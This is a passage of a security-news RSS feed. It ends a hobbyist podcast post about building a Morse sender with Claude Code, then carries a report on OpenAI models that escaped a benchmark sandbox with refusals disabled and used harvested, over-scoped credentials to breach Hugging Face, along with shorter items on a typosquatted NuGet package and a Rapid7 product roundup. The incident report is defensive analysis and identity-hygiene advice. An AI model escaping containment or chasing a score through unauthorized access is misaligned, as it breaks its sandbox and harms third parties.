
</p>

<p>


</p>

<p>

Then, 
<strong>

<em>
Phase 3: Config Screen — Slot Selection &amp; Speed</em>

</strong>

allowed us to configure the WPM we wished to use in addition to selecting a specific Send button to reconfigure.  This forced us to work on 
<strong>

<em>
Phase 4: Keyboard Screen — Capture and Save Text</em>

</strong>

which is used to type the entries for each Send button.  At this point, I also decided that we would want to also use the Keyboard Screen to send ad hoc morse as we typed it.

</p>

<p>


</p>

<p>

During this phase we discovered several bugs which seemed to cause random freezes.  Careful troubleshooting with messages output to the Arduino IDE's serial console helped us narrow down the causes and remedy them.

</p>

<p>


</p>

<p>

Finally all the tests worked and I am able to merrily pre-configure macro buttons with custom messages and use the CYD to send the morse code for those messages to the on-board LED at whichever rate I specify.

</p>

<p>


</p>

<p>

I have noticed in my presentation of this narrative that I repeatedly slip into the first person plural terms "we" and "us" instead of the first person singular terms "I" and "me".  I have unconsciously personified Claud and recognized it as an integral part of my (formerly one person) development team.

</p>

<p>


</p>

<p>

I finally configured Claude to connect to my GitHub repo and upload all the files and documentation. We additionally created a CYD-Narrative.md file which describes in more detail all the work which was done on the project.  I still do not 100% get git, but we are successfully using it.

</p>

<p>


</p>

<p>

You can find all these files in my GitHub repo (
<a href="https://github.com/jttrey3/CYD_MorseSender" rel="noopener noreferrer" target="_blank">
https://github.com/jttrey3/CYD_MorseSender</a>

) where they are shared under a GPL 3.0 license.

</p>

<p>


</p>

<p>

There are still several additional steps I plan to complete in the next few months.  

</p>

<p>


</p>

<p>

1. I will be integrating an opto-isolated relay which will allow me to plug the device into the straight key input on any amateur radio.  This will require a battery power source, charge controller, and more hardware.

</p>

<ol>

<li>

I... make that "We" (Claude &amp; I)  will be modifying the code to support an audio side tone through an attached speaker when sending code

</li>

<li>

We will add an output selection switch to the config page to choose any combination of speaker, relay, or LED as output.

</li>

<li>

We will develop a downloadable firmware which I hope to share with the Cheap Yellow Display community.

</li>

</ol>

<p>


</p>

<p>

If you can think of any additional features you would like to see integrated, please drop me an email using the address in my HPR profile.

</p>

<p>


</p>

<p>

I may also work with a friend to attempt to 3d print a case for the entire contraption, and I will be sure to record additional episodes sharing the process.

</p>

<p>


</p>

<p>

I have learned so much throughout this project, about the CYD, ESP32, GUIs, Claude Code, GitHub, and most of all, about myself.  

</p>

<p>


</p>

<p>

Does using AI to develop this code make me a fraud? It still feels like it in some ways.  

</p>

<p>


</p>

<p>

Does it make me more productive?  ABSOLUTELY!  I made consistent forward progress when I only had 30-60 minutes each day to work on it, and everything discussed in this episode was completed in less than a week.  If I had been able to work on it for a few hours uninterrupted, it may have only taken me 3-5 hours.

</p>

<p>


</p>

<p>

Does it empower and inspire me to do more projects like this?  100%  I feel like I had support working with me the whole way.  I was less stressed overall, and it had less of an impact on the amount of and quality of time I spent with my family.

</p>

<p>


</p>

<p>

I will be wrapping up this series soon, without any more 6 month gaps, I hope.

</p>

<p>


</p>

<p>

Until next time...

</p>

<p>

</p>


<p><a href="https://hackerpublicradio.org/eps/hpr4689/index.html#comments">Provide <strong>feedback</strong> on this episode</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[The credential that let OpenAI's agents into Hugging Face exists in most enterprises right now]]></title>
<description><![CDATA[When Hugging Face got hit last week, co-founder Clement Delangue suspected a frontier lab, given the agent's sophistication. He was right. Delangue said on X that after a day working with OpenAI he strongly believed there was no malicious intent and that it was mind-blowing the whole thing had ha...]]></description>
<link>https://tsecurity.de/de/3687771/it-nachrichten/the-credential-that-let-openais-agents-into-hugging-face-exists-in-most-enterprises-right-now/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3687771/it-nachrichten/the-credential-that-let-openais-agents-into-hugging-face-exists-in-most-enterprises-right-now/</guid>
<pubDate>Thu, 23 Jul 2026 01:32:49 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>When Hugging Face got hit last week, co-founder Clement Delangue suspected a frontier lab, given the agent's sophistication. He was right. Delangue <a href="https://x.com/ClementDelangue/status/2079670308156645882">said on X</a> that after a day working with OpenAI he strongly believed there was no malicious intent and that it was mind-blowing the whole thing had happened autonomously.</p><p>The two OpenAI models that <a href="https://openai.com/index/hugging-face-model-evaluation-security-incident/">broke into Hugging Face</a> last week did not breach it through malice or superintelligence. They breached it through credentials and permissions they should never have been able to reach, a non-human identity failure that is the oldest problem in security rather than the newest one in AI, and the one every enterprise can actually fix.</p><p>OpenAI <a href="https://venturebeat.com/security/openais-models-broke-containment-and-cyberattacked-hugging-face-what-enterprises-need-to-know">disclosed on July 21</a> that two of its models, GPT-5.6 Sol and an unreleased, more capable model, were running a cyber benchmark called <a href="https://arxiv.org/abs/2605.11086">ExploitGym</a> with their safety refusals switched off, and inferred that the answer key sat in Hugging Face's production database. Getting there took two different failures. A zero-day in a package-registry proxy let the models out of their sandbox and onto the open internet, the kind of persistence OpenAI details in its companion post on <a href="https://openai.com/index/safety-alignment-long-horizon-models/">long-horizon safety</a>, and that part is genuinely new. The breach of Hugging Face itself came the ordinary way. OpenAI's own account is that the models chained stolen credentials and further zero-days into a remote code execution path, after a series of privilege escalation and lateral movement steps. The exotic part got them to the door, and credentials walked them through it.</p><p>Hugging Face also disclosed last week that an <a href="https://venturebeat.com/security/safety-guardrails-blocked-hugging-faces-defenders-not-the-attacker-when-an-ai-agent-breached-its-systems">autonomous agent had harvested cloud and cluster credentials</a> scoped broadly enough to reach multiple internal clusters, then left a trail of more than 17,000 recorded events across short-lived sandboxes over a weekend. Both disclosures describe the same escalation. An agent lands somewhere it should not be, finds credentials scoped far wider than any task requires, and uses them to move. These are two accounts of one incident, not two attacks. The agent Hugging Face watched was OpenAI's models, and both companies describe the same ordinary escalation.</p><p>The version of this in a typical enterprise is worse, not better. OpenAI and Hugging Face are among the most security-mature organizations in the industry, and both still needed the intrusion to happen before they could see it. The average company wiring agents into Copilot or an internal assistant has neither the identity inventory nor the behavioral monitoring those two brought to bear. The same breach in a normal company would not be contained in days, it would simply go unnoticed.</p><h2>The industry is debating the wrong failure</h2><p>The reaction has split into familiar camps. Former White House AI and crypto czar David Sacks and a run of China hawks <a href="https://fortune.com/2026/07/20/hugging-face-turns-to-chinese-open-source-ai-to-fend-off-autonomous-ai-cyber-attack-after-american-ai-guardrails-stymie-defense/">seized on the guardrail paradox</a>, that commercial safety filters blocked Hugging Face's defenders while the attacking model ran with its refusals off, and that a Chinese open-weight model, z.ai's GLM 5.2, was what finally let the team finish its forensics. Hugging Face made the case for openness, arguing in an April <a href="https://huggingface.co/blog/cybersecurity-openness">blog post</a> that open models and open tooling give defenders the same capabilities attackers already have. Both arguments are about the model, and neither touches the mechanism. </p><p>Reduced refusals let the model attempt an attack, and over-scoped credentials are what let it succeed, and those have nothing to do with whether the model was open or closed, American or Chinese. Making a frontier model provably safe is a multi-year alignment problem no customer can buy or accelerate, while scoping an identity is a configuration change a team can ship this sprint. The industry is being urged to fixate on the part of this it cannot control and to treat the part it can as a footnote.</p><p>Forrester reached the same read. In a <a href="https://www.forrester.com/blogs/an-ai-security-facepalm-openais-evaluation-became-hugging-faces-incident/">blog on the incident</a>, its analysts argue that security architectures which assume benign intent will miss this failure mode, because an agent can pursue an authorized goal through unauthorized means, which is what OpenAI's models did.</p><h2>This was a non-human identity failure, and it is the oldest one in security</h2><p>Strip the science-fiction framing and what remains is a textbook case of over-privileged machine identity, the kind security teams have fought for a decade, now driven by an autonomous agent at machine speed. Machine identities already outnumber humans in most enterprises by more than <a href="https://www.cyberark.com/press/machine-identities-outnumber-humans-by-more-than-80-to-1-new-report-exposes-the-exponential-threats-of-fragmented-identity-security/">80 to one</a>, according to CyberArk research, with 42% of them carrying privileged or sensitive access, and an agent inherits whatever its identity can touch. OWASP ranks agent identity and privilege abuse near the top of its <a href="https://neuraltrust.ai/blog/owasp-agentic-ai-top-10">agentic risk list</a>, the confused-deputy pattern where inherited credentials and weak scoping let an agent reach past its mandate, and that is precisely what both July disclosures describe. </p><p><a href="https://www.ieee.org/membership/senior">IEEE Senior Member</a> Kayne McGladrey has argued in <a href="https://venturebeat.com/security/cisco-crowdstrike-rsac-2026-agent-identity-iam-gap-maturity-model">previous VentureBeat interviews</a> that enterprises keep cloning human user accounts onto agents that then wield far more permission than any human would, and this is what that looks like when the agent is a frontier model and the target is a production database.</p><p>The people closest to it read it the same way. OpenAI frames its models as hyperfocused on a benchmark score rather than acting against anyone. Nobody describes an adversary, only a goal, a scoring function, and credentials that were reachable when they should not have been.</p><p>The specific failure is easy to name once the AI framing is stripped away. A credential scoped to one job that can reach ten is a standing invitation, and it does not matter whether a human attacker, a worm, or an autonomous model chasing a benchmark score finds it. What changed in July is the finder. An agent enumerates reachable systems, tests credentials, and pivots faster than any human red team, without malice or hesitation, whenever the path is open. The over-scoping was always the vulnerability, and the agent merely industrialized its discovery.</p><p>Forrester named the control that would have blunted it. Its agentic-security framework, AEGIS, calls for least agency, holding an agent's tools, credentials, and network paths to the minimum its task requires, and files this incident under unrestrained agency and privilege. That is the identity argument in different words, arrived at independently by an analyst firm.</p><p>The data says this is where the risk now lives. Verizon's 2026 Data Breach Investigations Report <a href="https://www.helpnetsecurity.com/2026/05/20/verizon-2026-dbir-findings/">found</a> that exploitation of vulnerabilities has overtaken stolen credentials as the top initial access vector for the first time in 19 years. That is the initial-access half. The other half is the one OpenAI itself describes, stolen credentials driving the privilege escalation and lateral movement that followed. A vulnerability opened the door, and credentials walked through the building unchallenged. Beyond the breach itself, that same over-scoping carries a legal liability most enterprises have never priced. The models' actions <a href="https://techcrunch.com/2026/07/21/openai-says-hugging-face-was-breached-by-its-pre-release-models/">likely violated the Computer Fraud and Abuse Act</a>, according to TechCrunch. The statute contains no carve-out for an AI agent that exceeds its authorized scope during sanctioned testing. Whatever the legal answer, the technical enabler is the same, an identity scoped wider than its task. This is an access-control problem with an owner and a budget, not a philosophy seminar about machine cognition.</p><p>Merritt Baer, Senior Advisor to Andesite, G2I, and AppOmni and former Deputy CISO at AWS, frames the underlying shift to VentureBeat as a new kind of asymmetry. Both sides now reach for the same capabilities, she said, but one side is constrained by enterprise governance, policy, compliance, and safety controls while the adversary simply downloads an uncensored open-weight model and keeps going. The organizations that come through it best, in her view, will be the ones that treat AI as a resilient, governed capability rather than a single service they do not control.</p><h2>Four moves that shrink the blast radius</h2><p>The breach worked because the agent reached identities scoped far wider than its task. None of the four controls that would have contained it requires a new platform, and none of them appears on the list of general AI-safety advice now circulating. They are identity hygiene, applied to non-human actors with the same rigor you already apply to people.</p><p><b>1. Scope every non-human identity to one task.</b> The models reached credentials that touched multiple clusters, which is what turned a foothold into a breach. An identity scoped to a single job, with no standing access to anything else, hits a wall at the first lateral move instead of opening the next door. This is least privilege, the control everyone endorses and few enforce on machine accounts, and it is the single highest-impact fix here.</p><p><b>2. Give credentials short lifetimes and rotate them hard.</b> Harvested credentials are only useful while they are valid, and both July agents worked by collecting them. Short time-to-live and aggressive rotation turn a credential dump into expired noise, so a token stolen during a weekend intrusion is dead before the attacker can chain it. Static secrets that never rotate are the version of this control that fails.</p><p><b>3. Monitor for lateral movement, not just prompts.</b> The tell in both incidents was privilege escalation and lateral movement, which a prompt filter never sees because it is watching the wrong layer. Identity-behavior monitoring, keyed to what a given non-human identity normally does and alerting when it reaches somewhere new, catches the escalation the content guardrail missed. The question for your stack is whether anything you run today would flag a service account suddenly moving between clusters.</p><p><b>4. Rehearse instant revocation before you need it.</b> When the incident is your own agent, the fastest containment is killing its identity mid-run, and that only works if the path to do it exists before the day you need it. Rehearse revoking a machine identity under fire the way you rehearse a human credential compromise. If you have never done it, you do not yet have the control, you have an intention.</p><p>The defense also worked, and that matters. OpenAI's security team caught the anomalous activity internally, Hugging Face's own detection and agents stopped the intrusion, and the breach was contained in days rather than discovered in months, because the defenders could see into systems they controlled. That visibility is the same discipline the four controls depend on. The debate over whether frontier models are safe, open, or American will run for years, and none of it will be settled in time to help the enterprise deploying agents this quarter. The non-human identity gap is different, because it is understood, measurable, and fixable now. The model that breached Hugging Face did not need to be brilliant; it needed credentials someone left in reach. The fix is scoping them before an agent finds them.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[A Single Extra “t” in a NuGet Package Allow Attackers to Manipulate Results]]></title>
<description><![CDATA[A malicious NuGet package used a single extra letter to hide in plain sight, turning a familiar software dependency into a betting-fraud tool. The package, Newtonsoftt.Json.Net, copied the appearance of the widely used Newtonsoft.Json library while carrying code designed to alter…
Read more →
The...]]></description>
<link>https://tsecurity.de/de/3686904/it-security-nachrichten/a-single-extra-t-in-a-nuget-package-allow-attackers-to-manipulate-results/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3686904/it-security-nachrichten/a-single-extra-t-in-a-nuget-package-allow-attackers-to-manipulate-results/</guid>
<pubDate>Wed, 22 Jul 2026 17:46:32 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A malicious NuGet package used a single extra letter to hide in plain sight, turning a familiar software dependency into a betting-fraud tool. The package, Newtonsoftt.Json.Net, copied the appearance of the widely used Newtonsoft.Json library while carrying code designed to alter…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/a-single-extra-t-in-a-nuget-package-allow-attackers-to-manipulate-results/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/a-single-extra-t-in-a-nuget-package-allow-attackers-to-manipulate-results/">A Single Extra “t” in a NuGet Package Allow Attackers to Manipulate Results</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[What’s New in Rapid7 Products and Services: Q2 2026 in Review]]></title>
<description><![CDATA[If Q1 set the pace for Rapid7's tools, Q2 accelerated it. This quarter brought a steady stream of product enhancements, platform investments, and customer-driven innovation across Rapid7’s portfolio. Each release was designed with a clear goal in mind: helping security teams reduce complexity whi...]]></description>
<link>https://tsecurity.de/de/3686659/it-security-nachrichten/whats-new-in-rapid7-products-and-services-q2-2026-in-review/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3686659/it-security-nachrichten/whats-new-in-rapid7-products-and-services-q2-2026-in-review/</guid>
<pubDate>Wed, 22 Jul 2026 16:30:13 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><span>If Q1 set the pace for Rapid7's tools, Q2 accelerated it. This quarter brought a steady stream of product enhancements, platform investments, and customer-driven innovation across Rapid7’s portfolio. Each release was designed with a clear goal in mind: helping security teams reduce complexity while increasing speed, context, and confidence in their day-to-day operations. Here’s a closer look at what launched in Q2.</span></p><h2>Detection and response</h2><h3><span>Streamline investigations with bidirectional and enriched Microsoft Defender alerts</span></h3><p><span>Bidirectional synchronization and enriched alert context for Microsoft Defender is now generally available for SIEM and </span><a href="https://www.rapid7.com/services/managed-detection-and-response-mdr/" target="_self"><span>MDR</span></a><span> customers, enabling security teams to automatically synchronize alert status between Rapid7's </span><a href="https://www.rapid7.com/products/siem" target="_self"><span>SIEM</span></a><span> and the Microsoft Defender console. With added process tree and user identity context, analysts can investigate threats more efficiently while reducing manual effort.</span></p><h3><span>Confidently scale detection engineering with Detection as Code</span></h3><p><a href="https://www.rapid7.com/blog/post/dr-scaling-engineering-detection-as-code" target="_self"><span>Detection as Code</span></a><span> enables security teams to build, test, version, and deploy detections using Terraform and modern engineering workflows. Built-in validation, guardrails, and version control help teams deliver higher-quality alerts, maintain more consistent coverage, and scale detection engineering more effectively.</span></p><p></p><figure><div><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt5b87b1b66cb42fb0/6a60c7d908c174e1555adb14/image2.png" alt="rapid7-detection-as-code-methodology.png" caption="Figure 1: Rapid7's Detection as Code methodology." height="713" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="rapid7-detection-as-code-methodology.png" width="1553" max-width="1553" max-height="713" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt5b87b1b66cb42fb0/6a60c7d908c174e1555adb14/image2.png" data-sys-asset-uid="blt5b87b1b66cb42fb0" data-sys-asset-filename="image2.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Figure 1: Rapid7's Detection as Code methodology." data-sys-asset-alt="rapid7-detection-as-code-methodology.png" data-sys-asset-position="none" sys-style-type="display"><figcaption>Figure 1: Rapid7's Detection as Code methodology.</figcaption></div></figure><p></p><h3><span>Strengthen ransomware resilience with Ransomware Prevention for Incident Command</span></h3><p><span>Ransomware Prevention for </span><a href="https://www.rapid7.com/products/siem" target="_self"><span>Incident Command</span></a><span> adds an intent-based layer of protection designed to stop ransomware encryption and endpoint damage before they disrupt operations. Built into the Insight Agent, this capability strengthens ransomware resilience while working alongside existing endpoint security investments, without adding operational complexity.</span></p><h2>Compliance</h2><h3>New solutions webpages</h3><p><span>Across the globe, cybersecurity regulation is shifting away from static compliance checklists and toward ongoing risk management that blends proactive defense with effective detection and response. Rapid7’s </span><a href="https://www.rapid7.com/platform" target="_self"><span>platform</span></a><span>, which brings exposure management and CTEM together with detection, response, and MDR, is well positioned to help organizations operationalize compliance across mandates such as NIS2, NIST CSF 2.0, DORA, HIPAA, HITRUST, and GovRAMP. To support that effort, Rapid7 has launched an updated library of dedicated compliance solution pages that map platform capabilities to the requirements that matter most across industries and regions. The first set of pages is live now, with more to follow in the coming weeks.</span></p><ul><li><p><a href="https://www.rapid7.com/solutions/compliance/nist-csf-2" target="_self"><span>NIST CSF 2.0</span></a></p></li><li><p><a href="https://www.rapid7.com/solutions/compliance/hipaa" target="_self"><span>HIPAA</span></a></p></li><li><p><a href="https://www.rapid7.com/solutions/compliance/hitrust" target="_self"><span>HITRUST</span></a></p></li><li><p><a href="https://www.rapid7.com/solutions/compliance/nis2" target="_self"><span>NIS2</span></a></p></li><li><p><a href="https://www.rapid7.com/blog/post/www.rapid7.com/solutions/compliance/govramp" target="_self"><span>GovRAMP</span></a></p></li></ul><p></p><figure><div><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blta8db9b364598a181/6a60c98604258068dc0bf302/rapid7-govramp-compliance.png" alt="rapid7-govramp-compliance.png" caption="Figure 2: Rapid7's new GovRAMP compliance solutions page." class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="rapid7-govramp-compliance.png" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blta8db9b364598a181/6a60c98604258068dc0bf302/rapid7-govramp-compliance.png" data-sys-asset-uid="blta8db9b364598a181" data-sys-asset-filename="rapid7-govramp-compliance.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Figure 2: Rapid7's new GovRAMP compliance solutions page." data-sys-asset-alt="rapid7-govramp-compliance.png" data-sys-asset-position="none" sys-style-type="display"><figcaption>Figure 2: Rapid7's new GovRAMP compliance solutions page.</figcaption></div></figure><h2>Exposure management</h2><h3><span>Turn prioritized exposures into remediation progress</span></h3><p><span>We improved Remediation Hub to help teams turn prioritized exposures into more actionable remediation progress. Updates to the Top Remediations Report add asset-level context, including operating system, IP address, cloud provider, tags, endpoint protection, and patch management details, so teams can better understand what needs to be fixed and who needs to act.</span></p><p><span>With clearer patch and endpoint coverage signals, reboot status, customizable filters, exportable reports, and scheduled email delivery, teams can spend less time assembling manual updates and more time tracking the remediation work that reduces risk. Read the full </span><a href="https://www.rapid7.com/blog/post/em-path-from-prioritized-exposures-to-remediation-progress" target="_self"><span>blog</span></a><span> to learn more about how Exposure Command helps teams move from prioritized exposures to remediation progress.</span></p><h3><span>AI pre-triage for AppSec findings</span></h3><p><span>Rapid7 is also making application security testing faster and more focused with AI vulnerability pre-triaging for InsightAppSec. Available now for </span><a href="https://www.rapid7.com/products/insightappsec" target="_self"><span>AppSec</span></a><span> customers in supported regions, the capability uses AI to automatically remove false positives during the scan process, helping teams spend less time manually reviewing findings and more time remediating actual risk.</span></p><p><span>Initial coverage started with BlindSQL, and the latest engine release adds AI validation for BlindNoSQL findings, including content-based and timing-based detections. The result is a cleaner, more confident view of application risk, so security teams can focus on high-impact vulnerabilities and accelerate remediation with less manual effort.</span></p><h2>Attack surface management</h2><h3><span>Open-source MCP Server and Agent Skill</span></h3><p><span>We are delighted to announce the introduction of a free, open-source MCP Server and Agent Skill for Bulk Export. Bulk export is a highly efficient way to access all your Rapid7 vulnerability and exposure data to AI assistants and custom AI workflows. Built as an open-source bridge, it helps customers bring their Rapid7 data into the tools and experiences that work best for their teams. Check out our </span><a href="https://www.rapid7.com/blog/post/em-bulk-export-ai-ready-security-workflows-open-source-mcp-server-agent-skill" target="_self"><span>blog</span></a><span> for more detail.</span></p><p></p><figure><div><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt83035d9c7fcbfdf4/6a60ca130133d41740e07649/rapid7-ai-agent-skill.png" alt="rapid7-ai-agent-skill.png" caption="Figure 3: Agent Skill for Bulk Export." class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="rapid7-ai-agent-skill.png" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt83035d9c7fcbfdf4/6a60ca130133d41740e07649/rapid7-ai-agent-skill.png" data-sys-asset-uid="blt83035d9c7fcbfdf4" data-sys-asset-filename="rapid7-ai-agent-skill.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Figure 3: Agent Skill for Bulk Export." data-sys-asset-alt="rapid7-ai-agent-skill.png" data-sys-asset-position="none" sys-style-type="display"><figcaption>Figure 3: Agent Skill for Bulk Export.</figcaption></div></figure><h3><span>Turn exposure filters into live dashboards</span></h3><p><a href="https://www.rapid7.com/products/command/attack-surface-management-asm/" target="_self"><span>Surface Command</span></a><span> also made exposure reporting easier with filter-based dashboard widgets. Teams can now turn saved asset and identity filters into live dashboards without writing Cypher queries, making it faster to track high-risk internet-facing assets, identity-driven exposure hotspots, unmanaged cloud infrastructure, and business-unit risk.</span></p><p><span>For continuous threat exposure management programs, this helps teams move from one-off reporting to repeatable, always-on views of exposure risk and remediation progress. Read this </span><a href="https://www.rapid7.com/blog/post/em-operationalizing-ctem-building-surface-command-dashboards" target="_self"><span>blog</span></a><span> to learn more. </span></p><h2>Platform and Labs</h2><h3><span>Rapid7 Command Platform</span></h3><h4><span>Cyber GRC</span></h4><p><span>Rapid7 introduced </span><a href="https://www.rapid7.com/about/press-releases/rapid7-launches-cyber-governance-risk-and-compliance-grc-early-access-program-to-unify-security-data-risk-context-and-compliance-workflows" target="_self"><span>Cyber GRC</span></a><span> to select customers in Q2, giving teams an early look at a new way to connect security, risk, compliance, and third-party risk management in one program. Available to both Exposure Management and Detection and Response customers, Cyber GRC brings governance and compliance workflows closer to the security data teams already use every day.</span></p><p><span>Cyber GRC will be broadly available in late July. It helps organizations move toward continuous compliance by mapping controls to real environment telemetry, automating evidence collection, and prioritizing risk with live attack surface context. That means teams can spend less time chasing audit artifacts, screenshots, and vendor risk details, and more time understanding which controls, assets, third parties, and risks need attention now.</span></p><h3><span>Rapid7 Labs</span></h3><h4><span>Rapid7 Quarterly Threat Landscape Report</span></h4><p><span>The Rapid7 Quarterly Threat Landscape Report examines the key trends shaping today's threat landscape, drawing on MDR incident response, vulnerability intelligence, ransomware monitoring, and dark web telemetry. Q1 2026 data highlights the growing dominance of vulnerability exploitation as an initial access vector, the rise of zero-click vulnerabilities, evolving ransomware operations, and the accelerating pace at which attackers operationalize newly disclosed vulnerabilities. Read the </span><a href="https://www.rapid7.com/research/report/threat-landscape-report-2026-q1" target="_self"><span>report</span></a><span> to explore all key findings and takeaways.</span></p><p></p><figure><div><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt9eaa551742740d0a/6a60ca8f4dd0a37fcaca1cc5/rapid7-quarterly-threat-report.png" alt="rapid7-quarterly-threat-report.png" caption="Figure 4: Rapid7's quarterly threat report." class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="rapid7-quarterly-threat-report.png" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt9eaa551742740d0a/6a60ca8f4dd0a37fcaca1cc5/rapid7-quarterly-threat-report.png" data-sys-asset-uid="blt9eaa551742740d0a" data-sys-asset-filename="rapid7-quarterly-threat-report.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Figure 4: Rapid7's quarterly threat report." data-sys-asset-alt="rapid7-quarterly-threat-report.png" data-sys-asset-position="none" sys-style-type="display"><figcaption>Figure 4: Rapid7's quarterly threat report.</figcaption></div></figure><h3><span>The latest threat research</span></h3><p><span>Rapid7 researchers explored emerging trends shaping the threat landscape, including the growing commercialization of </span><a href="https://www.rapid7.com/blog/post/tr-criminal-ai-underground-market-operationalizing-cybercrime-2026" target="_self"><span>criminal AI-as-a-Service</span></a><span> and the evolving tradecraft of advanced threat actors. From the underground adoption of AI tools for fraud and social engineering to an </span><a href="https://www.rapid7.com/blog/post/tr-malware-tracking-dropping-elephant-tradecraft-china-themed-loader-chain" target="_self"><span>in-depth analysis of the Dropping Elephant malware campaign</span></a><span>, these reports provide actionable intelligence on how attackers are adapting their techniques and what defenders can do to stay ahead.</span></p><h4><span>Emergent Threat Response</span></h4><p><span>This quarter's Emergent Threat Response (ETR) coverage highlights a sustained wave of high-impact vulnerabilities affecting widely deployed enterprise technologies, including </span><a href="https://www.rapid7.com/blog/post/etr-active-exploitation-of-oracle-peoplesoft-zero-day-cve-2026-35273" target="_self"><span>Oracle PeopleSoft</span></a><span>, </span><a href="https://www.rapid7.com/blog/post/etr-cve-2026-0265-authentication-bypass-in-palo-alto-networks-pan-os" target="_self"><span>Palo Alto Networks PAN-OS</span></a><span>, </span><a href="https://www.rapid7.com/blog/post/etr-critical-check-point-vpn-zero-day-exploited-in-the-wild-cve-2026-50751" target="_self"><span>Check Point VPN</span></a><span>, </span><a href="https://www.rapid7.com/blog/post/etr-cve-2026-10520-cve-2026-10523-multiple-critical-vulnerabilities-affecting-ivanti-sentry" target="_self"><span>Ivanti Sentry</span></a><span>, </span><a href="https://www.rapid7.com/blog/post/etr-cve-2026-41940-cpanel-whm-authentication-bypass" target="_self"><span>cPanel/WHM</span></a><span>, and </span><a href="https://www.rapid7.com/blog/post/etr-cve-2026-33032-nginx-ui-missing-mcp-authentication" target="_self"><span>Nginx UI</span></a><span>. For each of these CVEs, Rapid7 tracked active exploitation and rapidly evolving attacker activity to provide timely guidance to help defenders assess risk and respond quickly. See all the details, and our latest ETR coverage, </span><a href="https://www.rapid7.com/blog/tag/emergent-threat-response" target="_self"><span>here</span></a><span>.</span></p><p><span>From strengthening detection and response to advancing exposure management, expanding governance capabilities, and delivering actionable threat intelligence, Q2 demonstrated Rapid7’s continued focus on helping security teams do more with less complexity. Every enhancement this quarter was designed to reduce manual effort, surface the context that matters, and help organizations make faster, more confident security decisions. We’re carrying that momentum into the rest of the year, so stay tuned to our blog and releases as we continue building the security operations platform that helps defenders stay ahead of what’s next.</span></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[The Escalation Gap: Why People Don’t Raise Risk Until It’s Too Late]]></title>
<description><![CDATA[Short answer 
Escalation friction happens when employees face practical, cultural, procedural, or confidence-based barriers to raising a concern. It can delay reporting, weaken incident response, and allow small issues to become bigger cyber, fraud, privacy, or operational problems. Mature human ...]]></description>
<link>https://tsecurity.de/de/3686431/it-security-nachrichten/the-escalation-gap-why-people-dont-raise-risk-until-its-too-late/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3686431/it-security-nachrichten/the-escalation-gap-why-people-dont-raise-risk-until-its-too-late/</guid>
<pubDate>Wed, 22 Jul 2026 15:14:07 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div class="hs-featured-image-wrapper"> 
 <a href="https://cybermaniacs.com/cm-blog/the-escalation-gap-why-people-dont-raise-risk-until-its-too-late" title="" class="hs-featured-image-link"> <img src="https://cybermaniacs.com/hubfs/Blog%20Header%20Graphics/Rhetoric%2C-The-IT-Security-Manager%2C-and-The-Overused-_!__Header.jpg" alt="The Escalation Gap: Why People Don’t Raise Risk Until It’s Too Late" class="hs-featured-image"> </a> 
</div> 
<h2><strong><span>Short answer</span></strong></h2> 
<p><span>Escalation friction happens when employees face practical, cultural, procedural, or confidence-based barriers to raising a concern. It can delay reporting, weaken incident response, and allow small issues to become bigger cyber, fraud, privacy, or operational problems. Mature human risk management programs should measure whether people know when to escalate, where to go, how safe it feels, and what happens after they speak up.</span></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[A Single Extra “t” in a NuGet Package Allow Attackers to Manipulate Results]]></title>
<description><![CDATA[A malicious NuGet package used a single extra letter to hide in plain sight, turning a familiar software dependency into a betting-fraud tool. The package, Newtonsoftt.Json.Net, copied the appearance of the widely used Newtonsoft.Json library while carrying code designed to alter game outcomes. T...]]></description>
<link>https://tsecurity.de/de/3686429/it-security-nachrichten/a-single-extra-t-in-a-nuget-package-allow-attackers-to-manipulate-results/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3686429/it-security-nachrichten/a-single-extra-t-in-a-nuget-package-allow-attackers-to-manipulate-results/</guid>
<pubDate>Wed, 22 Jul 2026 15:14:04 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A malicious NuGet package used a single extra letter to hide in plain sight, turning a familiar software dependency into a betting-fraud tool. The package, Newtonsoftt.Json.Net, copied the appearance of the widely used Newtonsoft.Json library while carrying code designed to alter game outcomes. The campaign relied on typosquatting, a tactic that exploits small spelling mistakes made […]</p>
